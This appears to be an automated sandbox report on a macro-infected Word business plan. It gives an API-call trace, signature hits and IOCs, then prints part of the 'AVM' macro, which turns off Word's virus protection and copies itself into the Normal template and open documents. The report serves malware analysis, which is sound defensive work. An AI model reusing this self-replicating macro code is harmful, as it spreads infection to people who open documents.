DynamicLoader: WINSPOOL.DRV/EnumPrinterDataExW
DynamicLoader: WINSPOOL.DRV/GetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataW
DynamicLoader: WINSPOOL.DRV/SpoolerPrinterEvent
DynamicLoader: WINSPOOL.DRV/SetPortW
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: WINSPOOL.DRV/DevicePropertySheets
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeA
DynamicLoader: WINSPOOL.DRV/AddPortExW
DynamicLoader: WINSPOOL.DRV/DeletePrintProvidorW
DynamicLoader: WINSPOOL.DRV/AddPrintProvidorW
DynamicLoader: WINSPOOL.DRV/DeletePrintProcessorW
DynamicLoader: WINSPOOL.DRV/DeleteMonitorW
DynamicLoader: WINSPOOL.DRV/AddMonitorW
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesA
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/DeviceCapabilitiesW
DynamicLoader: WINSPOOL.DRV/DeletePrinterIC
DynamicLoader: WINSPOOL.DRV/PlayGdiScriptOnPrinterIC
DynamicLoader: WINSPOOL.DRV/CreatePrinterIC
DynamicLoader: WINSPOOL.DRV/SetJobW
DynamicLoader: WINSPOOL.DRV/GetJobW
DynamicLoader: WINSPOOL.DRV/EnumJobsW
DynamicLoader: WINSPOOL.DRV/AddPrinterW
DynamicLoader: WINSPOOL.DRV/SetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintersW
DynamicLoader: WINSPOOL.DRV/AddPrinterConnectionW
DynamicLoader: WINSPOOL.DRV/DeletePrinterConnectionW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExA
DynamicLoader: WINSPOOL.DRV/EnumPrinterDriversW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrintProcessorW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorsW
DynamicLoader: WINSPOOL.DRV/GetPrintProcessorDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorDatatypesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/OpenPrinterA
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/FlushPrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterDataW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataW
DynamicLoader: WINSPOOL.DRV/AddJobW
DynamicLoader: WINSPOOL.DRV/ScheduleJob
DynamicLoader: WINSPOOL.DRV/WaitForPrinterChange
DynamicLoader: WINSPOOL.DRV/FindNextPrinterChangeNotification
DynamicLoader: WINSPOOL.DRV/PrinterMessageBoxW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/AddFormW
DynamicLoader: WINSPOOL.DRV/DeleteFormW
DynamicLoader: WINSPOOL.DRV/GetFormW
DynamicLoader: WINSPOOL.DRV/SetFormW
DynamicLoader: WINSPOOL.DRV/EnumFormsW
DynamicLoader: WINSPOOL.DRV/EnumPortsW
DynamicLoader: WINSPOOL.DRV/EnumMonitorsW
DynamicLoader: WINSPOOL.DRV/AddPortW
DynamicLoader: WINSPOOL.DRV/ConfigurePortW
DynamicLoader: WINSPOOL.DRV/DeletePortW
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: comctl32.dll/
The office file contains a macro
The office file contains a macro with auto execution
AutoOpen: Runs when the Word document is opened
AutoClose: Runs when the Word document is closed
The office file contains anomalous features
creation_anomaly: The file appears to have an edit time yet has no creation time or last saved time. This can be a sign of an automated document creation kit.
Creates a hidden or system file
file: C:\Users\user\AppData\Local\Temp\~$psh5v7u_m.doc
The office file contains a macro with potential indicators of compromise
E-mail address: Print #1, If x = 1 Then EMADDY = avm@nym.alias.net Else EMADDY = nick@virusbtn.com
Executable file name: Shell wscript c:\happy.vbs, vbHide
Executable file name: If Dir(c:\A4.vbs) = Then
Executable file name: Open c:\A4.vbs For Output As 1
Executable file name: Print #1, IV7 = WSHShell.ExpandEnvironmentStrings(%windir%\avm.vbs)
Executable file name: Open c:\happy.vbs For Output As 1
Executable file name: Shell wscript c:\a4.vbs, vbHide
The office file contains a macro with suspicious strings
Chr: May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open: May open a file
Shell: May run an executable file or a system command
vbHide: May run an executable file or a system command
Wscript_Shell: May run an executable file or a system command
Run: May run an executable file or a system command
Windows: May enumerate application windows (if combined with Shell.Application object)
CreateObject: May create an OLE object
VBProject: May attempt to modify the VBA code (self-modification)
VBComponents: May attempt to modify the VBA code (self-modification)
CodeModule: May attempt to modify the VBA code (self-modification)
AddFromString: May attempt to modify the VBA code (self-modification)
Write: May write to a file (if combined with Open)
Output: May write to a file (if combined with Open)
Print #: May write to a file (if combined with Open)
System: May run an executable file or a system command on a Mac (if combined with libc.dylib)
Attempts to interact with an Alternate Data Stream (ADS)
file: C:\Users\user\AppData\Local\Temp\Macintosh HD:Files:Company:coffeeconcept:Bus Plans:MS Plan Docs:Normal
file: C:\Users\user\AppData\Local\Temp\:Normal

Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

SummaryInformation Metadata

Creating Application Microsoft Word 9.0
Author Patrick Feld
Last Saved By Mark Portrait
Creation Time None
Last Saved Time None
Total Edit Time 37620
Document Title Brain Coffee Co. Preliminary Business Plan
Document Subject December 2003
Amount of Pages 42
Amount of Words 14927
Amount of Characters 85085

DocumentSummaryInformation Metadata

Company Brain Coffee Co.
Document Version None
Digital Signature None
Language None
Notes None

File Analysis (Signatures)

IOCs
E-mail address Print #1, If x = 1 Then EMADDY = avm@nym.alias.net Else EMADDY = nick@virusbtn.com
Executable file name Shell wscript c:\happy.vbs, vbHide
Executable file name If Dir(c:\A4.vbs) = Then
Executable file name Open c:\A4.vbs For Output As 1
Executable file name Print #1, IV7 = WSHShell.ExpandEnvironmentStrings(%windir%\avm.vbs)
Executable file name Open c:\happy.vbs For Output As 1
Executable file name Shell wscript c:\a4.vbs, vbHide
Suspicious
Chr May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open May open a file
Shell May run an executable file or a system command
vbHide May run an executable file or a system command
Wscript_Shell May run an executable file or a system command
Run May run an executable file or a system command
Windows May enumerate application windows (if combined with Shell.Application object)
CreateObject May create an OLE object
VBProject May attempt to modify the VBA code (self-modification)
VBComponents May attempt to modify the VBA code (self-modification)
CodeModule May attempt to modify the VBA code (self-modification)
AddFromString May attempt to modify the VBA code (self-modification)
Write May write to a file (if combined with Open)
Output May write to a file (if combined with Open)
Print # May write to a file (if combined with Open)
System May run an executable file or a system command on a Mac (if combined with libc.dylib)
AutoExec
AutoOpen Runs when the Word document is opened
AutoClose Runs when the Word document is closed

Extracted Macros

VBA Filename ThisDocument.cls Extracted Macro
Sub AutoOpen()
'AVM
On Error Resume Next
Dim DC, IT As Integer
Application.EnableCancelKey = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0
a = ActiveDocument.Saved
If Right(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
End If
If Right(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 3) <> "AVM" Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines - 1))
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
IT = (Day(Now))
DC = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC")
If DC = "" Or DC < IT Then
GoOk = True
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\8.0", "AVM-DC") = IT
End If
